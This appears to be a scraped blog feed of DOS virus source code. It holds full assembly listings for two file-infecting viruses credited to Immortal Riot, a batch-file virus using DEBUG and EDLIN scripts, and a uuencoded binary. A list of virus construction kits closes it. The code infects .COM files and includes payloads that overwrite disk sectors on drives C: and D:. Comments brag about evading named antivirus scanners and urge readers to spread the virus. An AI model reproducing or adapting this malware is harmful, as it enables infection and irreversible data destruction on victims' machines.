M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
M““““““““““““““““““““““““““““““
9““““““““““““““““““
`
end

CODE    SEGMENT PUBLIC  ‘CODE’
ORG     100h
ASSUME  CS:CODE,DS:CODE,SS:CODE,ES:CODE

DTA_fileattr    EQU     21
DTA_filetime    EQU     22
DTA_filedate    EQU     24
DTA_filesize    EQU     26
DTA_filename    EQU     30

virus_marker    equ     026FFh   ; JMP WORD PTR
virus_marker2   equ     00104h   ; 0104h
part1_size      equ     part1_end – part1_start
part2_size      equ     part2_end – part2_start
offset_off      equ     duh2
init_delay      equ     5280    ; Initial delay
delay           equ     400     ; Subsequent delay
num_Messages    equ     7       ; Number of “Bob” messages
waves           equ     7       ; Number of waves to go off after
infec_date      equ     0606h   ; Swedish National Day (0606)..

Counter         equ     108h
D_Mess          equ     110h
Int_08_Start    equ     112h

; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
; S&S Toolkit 6.54 (FindViru) “string” is placed at the “jmp word ptr duh”,
; If you finds something to add here, then do! The place he placed his
; string is there the virus identify itselves, and I’ve failed with get
; the virus to work after some dully attempt to add some meanless shit.
; Anyhow..I must say that Alan kicks my ass here!..Eat my shorts!..
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
part1_start:
jmp     word ptr duh
duh     dw      middle_part_end – part1_start + 100h
duh2    dw      0
part1_end:

middle_part_start:
middle_part_end:

; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
;Part 2 begins: Dis is the D-Cool part
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
part2_start:
cld
call    decrypt
mov     si, offset Go
add     si, offset_off
jmp     si

encrypt_val     db      00h

; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
; Encrypt/Decrypt isn’t really a “Crypt” Routine. Instead, it will check
; what day it if, and if it’s the second (2:nd) any month, procedure Stone-
; Heart will blow off. Stoneheart makes your “heart”-drives be quite empty.
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
DECRYPT:
ENCRYPT:
mov ah,2ah         ; Day-Checking..
int 21h             ;
cmp dl,02         ; Check if day 02..
je STONEHEART         ; If So..you’re a lucky guy
jmp SORRY         ; Otherwise..try with “date 02″..

STONEHEART:             ; Name of her..
cli             ;
mov    ah,2         ; Starting right on..
cwd             ; Starting it from 0.
mov    cx,0100h     ; Continue to 256….
int    026h         ; No Exchauses!
jmp    MARIA         ; Jump For Joy..(J4J)..

MARIA:                 ; Yeah, her’s other handle..
CLI             ;
MOV    AL,3         ; Continue with drive D..
MOV    CX,700         ; Make drive d’s heart fall apart..
MOV    DX,00         ; Start from sector 0
MOV    DS,[DI+99]     ; Put random crap in DS
MOV    BX,[DI+55]     ; More crap in BX
CALL    STONEHEART     ; J4J..once again..

SORRY:                 ; I’m feeling soo sorry for you!
RET                 ; Cuz you managed to return!

; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
; This used to be under Decrypt/Encrypt, but well, since I don’t want
; no encryptions in this virus, I just remarked this..And well, Mcaffe’s
; Beta String used to be place at “mov di, si”, that might also be a little
; reason..Anyhow..since I didn’t coded this from scratch, I can’t deny you
; from modify in this code..So..Get your Encryption if you wants!
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
;         MOV     si, offset encrypt_val
;         ADD     si, offset_off
;         MOV     ah, byte ptr [si]
;         MOV     cx, offset part2_end – offset bam_bam
;         ADD     si, offset bam_bam – offset encrypt_val
;         MOV     di, si ; – “Beta-String used to be here..
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
xor_loop:
lodsb                           ; DS:[SI] -> AL
xor     al, ah
stosb
loop    xor_loop
ret

copy_rest_stuff:
; Copying routine
push    si            ; SI -> buffer3
call    encrypt
mov     cx, part2_size
pop     dx
add     dx, offset part2_start – offset buffer3
mov     ah, 40h
int     21h
call    decrypt        ; See what to do..
bam_bam:
ret

buffer    db 0CDh, 20h, 0, 0, 0, 0, 0, 0
buffer2   db part1_end – part1_start dup (?)
buffer3   dw ?
orig_path db 64 dup (?)
num_infec db 0                  ; Infection wave number
infec_now db 0                  ; Number files infected this time
root_dir  db ‘\’,0        ; Root Dir spec
com_mask  db ‘*.com’,0        ; Files to infect
dir_mask  db ‘*.*’,0        ; Files to search for..
back_dir  db ‘..’,0        ; Dot-Dot..
nest      dw 0

DTA     db 43 DUP (0)           ; For use by infect_dir

Go:                ; Proc there Mcaf “cloud” string is placed.

add     si, offset buffer – offset Go
mov     di, si
add     di, offset buffer2 – offset buffer
cmp     dx, infec_date          ; Added this two lines, and
jz      Go_Psycho               ; “Cloud” string is gone…
mov     cx, part1_size
rep     movsb
mov     ah, 47h                 ; Get directory
xor     dl,dl                   ; Default drive
add     si, offset orig_path – offset buffer – 8
int     21h                     ; in orig_path

jc      Go_Error
mov     ah, 3Bh                 ; Change directory
mov     dx, si                  ; to the root dir
add     dx, offset root_dir – offset orig_path
int     21h
jc      Go_Error

add     si, offset num_infec – offset orig_path
inc     byte ptr [si]           ; New infection wave

push    si                      ; Save offset num_infec

add     si, offset infec_now – offset num_infec
mov     byte ptr [si], 3        ; Reset infection
; counter to 3
; for D-new run.

call    traverse_fcn            ; Do all the work

pop     si                      ; Restore offset num_infec
cmp     byte ptr [si], waves    ; 10 infection waves?
jge     Go_Psycho               ; If so, activate

mov     ah, 2Ah                 ; Get date
int     21h
cmp     dx, infec_date          ; Is it 06/06?
jz      Go_Psycho               ; If so, activate

Go_Error:
jmp     quit                    ; And then quit

Go_Psycho:
jmp     Psycho            ; Yeah, right!

origattr  db 0
origtime  dw 0
origdate  dw 0
filesize  dw 0                ; Size of the uninfected file

oldhandle dw 0

; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
;D-Traversal function begins
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
traverse_fcn proc    near
push    bp                      ; Create stack frame
mov    bp,sp
sub     sp,44                   ; Allocate space for DTA
push    si

jmp     infect_directory
In_fcn:
mov     ah,1Ah                  ;Set DTA
lea     dx,word ptr [bp-44]     ;to space allotted
int     21h                     ;Do it now, do it hard!

mov     ah, 4Eh                 ;Find first
mov     cx,16                   ;Directory mask
mov     dx,offset dir_mask      ;*.*
add     dx,offset_off
int     21h
jmp     short isdirok
gonow:
cmp     byte ptr [bp-14], ‘.’   ;Is first char == ‘.’?
je      short donext            ;If so, loop again
lea     dx,word ptr [bp-14]     ;else load dirname
mov     ah,3Bh                  ;and changedir there
int     21h                     ;Yup, yup
jc      short donext            ;Do next if invalid
mov     si, offset nest         ;Else increment nest
add     si, offset_off
inc     word ptr [si]           ;nest++
call    near ptr traverse_fcn   ;recurse directory
donext:
lea     dx,word ptr [bp-44]     ;Load space allocated for DTA addr
mov     ah,1Ah                  ;and set DTA to it
int     21h                     ;cause it might have changed

mov     ah,4Fh                  ;Find next
int     21h
isdirok:
jnc     gonow                   ;If OK, jmp elsewhere
mov     si, offset nest
add     si, offset_off
cmp     word ptr [si], 0        ;If root directory (nest == 0)
jle     short cleanup           ; Quit
dec     word ptr [si]           ;Else decrement nest
mov     dx,offset back_dir      ;’..’
add     dx, offset_off
mov     ah,3Bh                  ;Change directory
int     21h                     ;to previous one
cleanup:
pop     si
mov    sp,bp
pop    bp
ret
traverse_fcn endp
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
;D-Traversal function ends
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
Goto_Error:
jmp     Error

enuff_for_now:
;Set nest to nil
mov     si, offset nest         ;in order to
add     si, offset_off          ;halt the D-Cool
mov     word ptr [si], 0        ;traversal fcn
jmp     short cleanup
return_to_fcn:
jmp     short In_fcn            ;Return to traversal function

infect_directory:
mov     ah, 1Ah                 ;Set DTA
mov     dx, offset DTA          ;to DTA struct
add     dx, offset_off
int     21h

find_first_COM:
mov     ah, 04Eh                ;Find first file
mov     cx, 0007h               ;Any file
mov     dx, offset com_mask     ;DS:[DX] –> filemask
add     dx, offset_off
int     21h                     ;Fill DTA (hopefully)
jc      return_to_fcn           ; Error #E421:0.1
jmp     check_if_COM_infected   ;I<___-Cool! Found one!

find_next_file2:
mov     si, offset infec_now    ;Another loop,
add     si, offset_off          ;Another infection
dec     byte ptr [si]           ;Infected three?
jz      enuff_for_now           ;If so, exit
find_next_file:
mov     ah,4Fh                  ;Find next
int     21h
jc      return_to_fcn

check_if_COM_infected:
mov     si, offset DTA + dta_filename + 6 ; look at 7th letter
add     si, offset_off
cmp     byte ptr [si], ‘D’              ;??????D.COM?
jz      find_next_file                  ;Don’t kill COMMAND.COM

mov     ax,3D00h                        ;Open channel read ONLY
mov     dx, si                          ;Offset Pathname in DX
sub     dx, 6
int     21h                             ;Open NOW!
jc      find_next_file                  ;If error, find another

xchg    bx,ax                           ;bx is now handle
mov     ah,3Fh                          ;Save
mov     cx, part1_size                  ;first part
mov     dx, offset buffer               ;to buffer
add     dx, offset_off                  ;to be restored
push    dx
int     21h                             ;later

pop     si                              ;Check for virus ID bytes
;in the buffer
push    si
lodsw                                   ;DS:[SI] -> AX
cmp     ax, virus_marker                ;Compare it
jnz     infect_it                       ;infect if ID #1 not found

lodsw                                   ;Check next two bytes
cmp     ax, virus_marker2               ;Compare it
jnz     infect_it                       ;infect if ID #2 not found
pop     si
bomb_out:
mov     ah, 3Eh                         ;else close the file
int     21h                             ;and go find another
jmp     find_next_file                  ;’cuz it’s already infected

Signature db ‘Immortal Riot’

; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
;D-Good Stuff – Infection routine
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
infect_it:
; save fileattr
pop     si
add     si, offset DTA + DTA_fileattr – offset buffer
mov     di, si
add     di, offset origattr – offset DTA – DTA_fileattr
movsb                                   ;DS:[SI] -> ES:[DI]
movsw                                   ;Save origtime
movsw                                   ;Save origdate
movsw                                   ;Save filesize
;Only need LSW
;because COM files
;can only be up to
;65535 bytes long
cmp     word ptr [si - 2], part1_size
jl      bomb_out                        ;is less than 8 bytes.

do_again:
mov     ah, 2Ch                         ;get time
int     21h
add     dl, dh                          ;1/100 sec + 1 sec
jz      do_again                        ;Don’t want orig strain!

mov     si, offset encrypt_val
add     si, offset_off
mov     byte ptr [si], dl               ;255 mutations

mov     ax, 4301h                       ;Set file attributes
xor     cx, cx                          ;to nothing
mov     dx, si                          ;filename in DTA
add     dx, offset DTA + DTA_filename – offset encrypt_val
int     21h                             ;do it now, my child

mov     ah, 3Eh                         ;Close file
int     21h                             ;handle in BX

mov     ax, 3D02h                       ;Open file read/write
int     21h                             ;Filename offset in DX
jc      bomb_out                        ;Damn! Probs

mov     di, dx
add     di, offset oldhandle – offset DTA – DTA_filename
;copy filehandle to
;oldhandle
stosw                                   ;AX -> ES:[DI]
xchg    ax, bx                          ;file handle in BX now

mov     ah, 40h                         ;Write DS:[DX]->file
mov     cx, part1_size – 4              ;number of bytes
mov     dx, 0100h                       ;where code starts
int     21h                             ;(in memory)

mov     ah, 40h
mov     si, di                          ; mov si, offset filesize
add     si, offset filesize – 2 – offset oldhandle
add     word ptr [si], 0100h
mov     cx, 2
mov     dx, si
int     21h                             ;write jmp offset

mov     ax, [si]                        ;AX = filesize
sub     ax, 0108h

add     si, offset buffer3 – offset filesize
push    si
mov     word ptr [si], ax
mov     ah, 40h
mov     cx, 2
mov     dx, si
int     21h

mov     ax, 4202h                       ;move file ptr
xor     cx, cx                          ;from EOF
xor     dx, dx                          ;offset cx:dx
int     21h

call    copy_rest_stuff

pop     si
add     si, offset oldhandle – offset buffer3
mov     bx, word ptr [si]
mov     ax, 5701h                       ;Restore
add     si, offset origtime – offset oldhandle
mov     cx, word ptr [si]               ;old time and
add     si, 2
mov     dx, word ptr [si]               ;date
int     21h

mov     ah, 3Eh                         ;Close file
int     21h

mov     ax, 4301h                       ;Restore file
xor     ch, ch
add     si, offset origattr – offset origtime – 2
mov     cl, byte ptr [si]               ;attributes
mov     dx, si                          ; filename in DTA
add     dx, offset DTA + DTA_filename – offset origattr
int     21h                             ;do it now

jmp     find_next_file2

GotoError:
jmp     error

Psycho:
; Check if already installed
push    es
mov     byte ptr cs:[100h],0            ;Initialize fingerprint
xor     bx, bx                          ;Zero BX for start
mov     ax, cs
Init1:  inc     bx                              ;Increment search segment
mov     es, bx                          ;value
cmp     ax, bx                          ;Not installed if we reach
je      Not_Installed_Yet               ;the current segment
mov     si, 100h                        ;Search segment for
mov     di, si                          ;fingerprint in first
mov     cx, 4                           ;four bytes
repe    cmpsb                           ;Compare
jne     init1                           ;If not equal, try another
jmp     Quit_Init                       ;else already installed

Not_Installed_Yet:
pop     es
mov     word ptr cs:[Counter], init_delay
mov     word ptr cs:[D_Mess],    1

; Copy interrupt handler to beginning of code
mov     si, offset _int_08_handler
add     si, offset_off
mov     di, Int_08_Start
mov     cx, int_end – int_start
rep     movsb                   ;DS:[SI]->ES:[DI]

mov     ax, 3508h               ;Get int 8 handler
int     21h                     ;put in ES:BX

mov     cs:[duh], bx            ;Save old handler
mov     cs:[duh+2], es          ;in cs:[104h]

mov     ax, 2508h               ;Install new handler
mov     dx, Int_08_Start        ;from DS:DX
int     21h                     ;Do it

push    es
mov     ax, ds:[2Ch]            ;Deallocate program
mov     es, ax                  ;environment block
mov     ah, 49h
int     21h
pop     es

mov     ax, 3100h               ;TSR
mov     dx, (offset int_end – offset int_start + offset part1_end – offset Code + 4 + 15 + 128) SHR 4

; these two lines are the “long” line above..pls, but ?m together..
; mov dx, (offset int_end – offset int_start + offset part1_end -
; offset Code + 4 + 15 + 128) SHR 4

int     21h
int     20h                     ;In case of error
Quit_Init:
pop     es
Error:                                  ;On error, quit
Quit:
mov     ah, 3Bh                 ;Change directory
mov     dx, offset root_dir     ;to the root dir
add     dx, offset_off
int     21h

mov     ah,3Bh                  ;Change directory
;Return to orig dir
add     dx, offset orig_path – offset root_dir
int     21h

; Copy buffer back to beginning of file
mov     si, dx
add     si, offset buffer2 – offset orig_path
mov     di, 0100h
mov     cx, part1_end – part1_start
rep     movsb

mov     di, 0100h
jmp     di
int_start:
_int_08_handler proc far
push    ax
push    bx
push    cx
push    dx
push    si
push    ds
push    es
pushf
dec     word ptr CS:[Counter]            ;Counter
jnz     QuitNow
;ACTIVATION!!!
mov     word ptr CS:[Counter], delay     ;Reset counter

; Set up DS & ES to equal CS
push    cs
pop     ds
push    cs
pop     es

mov     si, offset Messages – offset int_start + int_08_start
mov     cx, cs:D_Mess
xor     ah, ah
LoopY_ThingY:
lodsb                           ;DS:SI -> AL
add     si, ax                  ;ES:BP -> Next message to display
loop    LoopY_ThingY

lodsb
xchg    si, bp

xor     cx, cx
mov     cl, al                  ;Length of string
mov     ax, 1300h               ;
mov     bx, 0070h               ;Page 0, inverse video
xor     dx, dx                  ;(0,0)
int     10h                     ;Display ES:BP
inc     word ptr cs:[D_Mess]
cmp     word ptr cs:[D_Mess], num_messages
jnz     Sigh
mov     word ptr cs:[D_Mess], 1

Sigh:   mov     cx, 30h
Sigh2:  push    cx
mov     cx, 0FFFFh
DelayX: loop    DelayX
pop     cx
loop    Sigh2
xchg    si, bp
QuitNow:
popf
pop     es
pop     ds
pop     si
pop     dx
pop     cx
pop     bx
pop     ax
jmp     dword ptr CS:duh
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-
; Please don’t just change the notes here included in the virus, and
; claim    that it’s your production. I know this isn’t mine, but afterall,
; you could atleast say that I “renaissanced” it. Cuz mane people actually
; scans their programs nowdays (..or atleast here..), which makes it
; quite stupid to spread a virus which scan etc can find. And well, I’d
; like to get this little shit a bit spread..can you get it for me? ..
; ??-???-????????–????–??????-?????–???????-??????—-??????-?????-????-

Messages db      0
db      15, ‘Maria K lives..’          ; She ain’t dead..
db      21, ‘Somewhere in my heart..’      ; That’s truh..huh?
db      22, ‘Somewhere in Sweden..’      ; She lives here!
db      26, ‘I might be insane..’      ; I might be that..
db      38, ‘But the society to blame..’ ; Might be true….
db      40, ‘The Unforgiven / Immortal Riot’ ; That’s me….

_int_08_handler endp
int_end:
part2_end:

CODE    ends
end     part1_start

; Greetings goes out to: Raver, Metal Militia, Scavenger,
; and of-cuz a mega Greeting to Maria K !..

A BATCH Virus (By Frosty of the GCMS)
—————————————–

Whoever thought that viruses could be in BATCH files? This virus which
we are about to see makes use of the MS-DOS operating system. This BATCH
virus uses DEBUG & EDLIN programs.

NAME: VR.BAT

ECHO = OFF        (Self explanatory)
CTTY NUL          (This is important. Console output is turned off)
PATH C:\MSDOS     (May differ on other systems)
DIR *.COM/W>IND   (The directory is written on “ind” ONLY name entries)
EDLIN IND<1       (“ind” is processed with EDLIN so only file names appear)
DEBUG IND<2       (New batch program is created with debug)
EDLIN NAME.BAT<3  (This batch goes to an executable form because of EDLIN)
CTTY CON          (Console interface is again assigned)
NAME              (Newly created NAME.BAT is called)

In addition to this Batch file, there are command files, here named 1,2,3.
Here is the first command file:

NAME: 1

1,4D              (Here line 1-4 of the “ind” file are deleted)
E                 (Save file)

Here is the second command file:

NAME: 2

M100,10B,F000     (First program name is moved to the F000H address to save)
E108″.BAT”        (Extension of file name is changed to .BAT)
M100,10B,F010     (File is saved again)
E100″DEL”         (DEL Command is written to address 100H)
MF000,F00B,104    (Original file is written after this command)
E10C 2E           (Period is placed in front of extension)
E110 0D,0A        (Carriage return plus line feed)
MF010,F020,11F    (Modified file is moved to 11FH address from buffer area)
E112″COPY\VR.BAT” (Copy command is now placed in front of file)
E12B 0D,0A        (Copy command terminated with carriage return + line feed)
RXC               (The CX register is …)
2C                (Set to 2CH)
NNAME.BAT         (Name it NAME.BAT)
W                 (Write)
Q                 (Quit)

The third command file must be printed as a hex dump because it contains
two control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:

NAME: 3

0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110   79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root. This
Program only affects .COM files.

Remember Where You Saw it First
———–> Perfect Crime : +31-(0)-79-426-079 <————-
Typing Work Done by OMEGA/MEGA-Ind.

; This is a “mutation”, of Tormentor’s .COM lession. I’ve modified
; some stuffs, but since I liked the .EXE infector better, I didn’t
; cared too much about this one.

; Anyway, this is a non-resident current directory (yuck!), infector
; of .COM programs. It’ve added a encryption routine, but it’s nothing
; really to scream hurray for.

; It’s also a bit destructive, well, it’s 5% chance at each run, that
; one of drive c: or d: gets kinda phucked up. This routine was as
; usual “stolen” from Nowhere Man of NuKE. I must admit I like it!

; Scan/MSAV/CPAV and F-prot can’t find as usual find shits! I think
; that ThunderByte AntiVirus heurtistic scanner found the infected
; files as “probably/possible” infected, I really dunno, you try it
; out by your self!

; “We do not live forever, but mind never leaves our souls.” (Dark Image).

;=============================================================================
; **** PARADISE LOST! ****
;=============================================================================

.model tiny
.radix 16
.code

Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.

org 100

dummy_code: db ‘M’ ; Mark file as infected.
db 3 DUP(90) ; This is to simulate a infected prog.
; Not included in virus-code.

Virus_Start: call where_we_are ; Now we call the next bytes, just to

; F-prot founded the ‘lession -1′virus here in the unencrypted area, but by
; simple add the push si, and the extra pop, it compleatele screwed up, and
; couldn’t found it as nothing!, HA! Eat dust, looser!

where_we_are: push si
pop si ; Since the virus-code’s address will
pop si

;———————————————————————–
; Now we have to put back the original 4 bytes in the host program, so
; we can return control to it later:
add si,_4first_bytes-where_we_are
mov di,100
cld
movsw
movsw
;————————————————————————
; We have to use SI as a reference since files differ in size thus making
; virus to be located at different addresses.

sub si,_4first_bytes-Virus_Start+4

call encrypt_decrypt ; differ from victim to victim.
jmp encryption_start ; a POP SI after a call will give us the
; address which equals to ‘where_we_are’
; Very important.
write_virus:
call encrypt_decrypt
mov ah,40 ; Append file with virus code.
mov cx,offset Virus_Lenght
mov dx,si ; Virus_Lenght.
int 21
call encrypt_decrypt
ret

encryption_value dw 0
encrypt_decrypt:

mov di,offset encryption_start-virus_start
add di,si
mov cx,(end_of_encryption-encryption_start+1)/2

push bx
mov bx,offset encryption_value-virus_start
add bx,si
mov dx,word ptr [bx]
pop bx

again:
xor word ptr cs:[di],dx
add di,2
loop again
ret
;————————————————————————
; Now we just have to find victims, we will look for ALL .COM files in
; the current directory.

encryption_start:
;set_dta:
mov ah,1ah
lea dx,[si+offset dta-virus_start]
int 21h
mov ah,4e ; We start to look for a *.COM file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21

jc no_victim_found

; clear attribs: before open file
mov ax,4301h
xor cx,cx
lea dx,[si+virus_end+1eh]
int 21h
mov ax,3d02 ; Now we open the file.
lea dx,[si+offset DTA-virus_start+1eh] ;now also including
int 21 ; DTA.
jc cant_open_file ; If file couldn’t be open.

xchg ax,bx ; Save filehandle in bx
; (we could use MOV BX,AX but we saves one byte by using xchg )

mov ah,3f ; Now we read the first 4 bytes
mov cx,4 ; from the victim -> buffer

mov dx,offset _4first_bytes-Virus_Start
add dx,si
; We will then overwrite them with
int 21 ; a JMP XXXX to virus-code at end.

jc read_error

cmp byte ptr ds:[si+_4first_bytes-Virus_Start],’M’
jz sick_or_EXE ; Check if infected OR *.EXE

; Almost all EXE files starts with ‘M’ and we mark the infected files by
; starting with ‘M’ which equals to DEC BP
; Now we just have to have one check instead of 2 (infected and *.EXE)

mov ax,4202 ; Position file-pointer to point at
xor cx,cx ; End-of-File.
xor dx,dx ; Any writing to file will now APPEND it
int 21 ; Returns AX -> at end.

sub ax,4 ; Just for the JMP structure.

mov word ptr ds:[_4new_bytes+2],ax
; Build new JMP XXXX to virus.
; ( logic: JMP AX )

mov word ptr [si+encryption_value-virus_start],99 ; encryption_value.
call write_virus

;
; mov ah,40 ; Append file with virus code.
; mov cx,offset Virus_Lenght
; mov dx,si ; Virus_Lenght.
; int 21
; jc write_error

mov ax,4200 ; Position file-pointer to begin of file
xor cx,cx ; So we can change the first 3 bytes
xor dx,dx ; to JMP to virus.
int 21

mov ah,40 ; Write new 3 bytes.
mov cx,4 ; After this, executing the file will
mov dx,offset _4new_bytes-Virus_Start
add dx,si
; result in virus-code executing before
int 21 ; original code.
jc write_error

; then close the file.
mov ah,3e ; Close file, now file is infected.
int 21 ; Dos function 3E (close handle)

Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let’s
jmp look4victim ; find another victim…

write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.

; randomize:
mov ah,2ch ;get a new random number
int 21h ;5% chance of nuke
cmp dl,5
ja real_quit
jmp which

which:
mov ah,2ch
int 21h
cmp dl,50
ja nuke_c
jmp nuke_d

nuke_c:
cli ;
mov ah,2 ; 2=c:
cwd ;
mov cx,0100h ;
int 026h ;
JMP REAL_QUIT

nuke_d:
cli
mov ah,3 ; 3=d:
cwd
mov cx,0100h
int 026h
jmp real_quit

real_quit:
mov ax,100 ; Every thing is put back in memory,
push ax ; lets us RET back to start of program
ret ; and execute the original program.

notes db ‘[PARADIS LOST!] (c) 93 The Unforgiven/Immortal Riot’
file_match db ‘*.COM’,0 ; Pattern to search for.

end_of_encryption:
_4first_bytes: ret ; Here we save the 4 first org. bytes
db 3 DUP(0)
; We have a ret here since this file isn’t a REAL infection.

_4new_bytes db ‘M’,0E9, 00, 00 ; Here we build the 4 new org. bytes
datestamp equ 24 ; Offset in DTA of file’s date stamp
timestamp equ 22 ; Offset in DTA of file’s time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute

; so our virus-code will be run first.
Virus_End EQU $
dta db 42 DUP (?)
end dummy_code
begin 775 paralost.com
M39″0D.@“%9>7H’&)@&_“’\I:6![BT!Z!4`ZRV0Z`\`M$"Y,0&+ULTAZ`,`
MPP``OT8``_ZY<@!3NRH``]Z+%ULN,16#QP+B^,.T&HV4,0′-(;1.NB,!`];-
M(7)BN`%#,\F-E%,”S2&X`CV-E$\!S2%R3).T/[D$`+HI`0/6S2%R/8"\*0%-
M=#*X`D(SR3/2S2$M!`"C,P+'1"J9`.A^_[@`0C/),]+-(;1`N00`NBT!`];-
M(7((M#[-(;1/ZY6T+,TA@/H%=R?K`9"T+,TA@/I0=P/K#9#ZM`*9N0`!S2;K
M#9#ZM`.9N0`!S2;K`9"X``%0PUM005)!1$E3($Q/4U0A72`H8RD@.3,@5&AE
G(%5N9F]R9VEV96XO26UM;W)T86P@4FEO=”HN0T]-`,,“`!-Z0“
`
end

]]> http://virusconstruction.wordpress.com/2008/08/02/listing-virus-backtime/feed/ 0 Ed http://virusconstruction.wordpress.com/2008/07/26/virus-constructor/ http://virusconstruction.wordpress.com/2008/07/26/virus-constructor/#comments Sat, 26 Jul 2008 04:29:19 +0000 programmervb http://virusconstruction.wordpress.com/?p=4 ]]> Constructor.DOS.G2
G2 (‘the second Generation in Virus Creation’) is a virus creator. It produces viral assembler source of different virus types. The characteristics of the G2-based virus are selected by editing a configuration file. There are several options: infect COM, EXE or both; resident or nonmemory resident;…

Constructor.DOS.BWG
Constructor creates batch payload programs. It is written in Basic for DOS. It creates payload programs of the following types: internet worms mIRC worms pIRC worms installing to the win.ini installing to the system registry startup key installing to the startup directory deletes antivirus…

Constructor.DOS.Dreg
DREG (Digital Hackers’ Alliance Randomized Encryption Generator) is a virus constructor. It creates virus source codes (ASM files), then runs TASM and TLINK to compile these source to executable files. DREG creates nonmemory resident encrypted COM viruses. They search for COM files in the…

Constructor.DOS.IVP_10
IVP (‘INSTANT VIRUS PRODUCTION KIT’) is a virus creation kit. It produces viral assembler source of different virus types. The characteristics of the IVP-based viruses are selected by editing a configuration file. There are several options: infect COM, EXE or both; encrypted or not; INT 24h hooking…

Constructor.DOS.NRLG
NRLG (NuKE Randomic Life Generator) constructor creates encrypted memory resident COM/EXE DOS viruses. While creating a virus, the user may select the en/decryption code – the virus generates random selected codes and displays them on the screen

Constructor.DOS.PS-MPC
PS-MPC (The Phalcon/Skism Mass-Produced Code Generator) is the second most known virus constructor, after VCL. The features of that constructor are described in the documentation that is distributed in the main PS-MPC package: The Phalcon/Skism Mass-Produced Code Generator is a tool, which…

Constructor.DOS.VCL
The virus constructor utility VCL.EXE (Virus Creation Laboratory) seems to be the most well-known virus creation tool. This constructor can generate source assembler files of the viruses, OBJ modules and infected master files. VCL contains the standard pop-up menu interface. By using VCL menus, it…

Constructor.MSWord.Cvck
This is a CVCK-based virus. It contains 11 macros: AutoExec, AutoOpen, Action, Action2, stdClose, HelpAbout, Organizer, ActionDate, ToolsMacro ( Ñ+ ), FileTemplates, and ToolsCustomize. It infects the global macros area upon the opening of an infected document, and is written to documents upon…

Constructor.MSWord.DW97Mvck
This is a macro Word97 virus construction tool. The constructor itself is a Word97 document that contains seventeen modules: DW97MVCK, frmStartForm, frmVirusSourceName, frmVirusBody, frmStealth, frmRetro, frmPolymorphic, frmPayload, frmPayloadMessageBox, frmPayloadSetPassword, frmPayloadBeep,…

Constructor.MSWord.NTVCK
This is a Word2000 macro-virus construction tool. The constructor itself is a Word2000 document that contains 14 modules: NTVCK, frmPlugin, Main, frmSecret, frmcontact, frminfection, KillAV, frmPayload, frmStart, frmGreetz, frmAuthor, Ende, frmname, and boom. When run, the constructor displays a…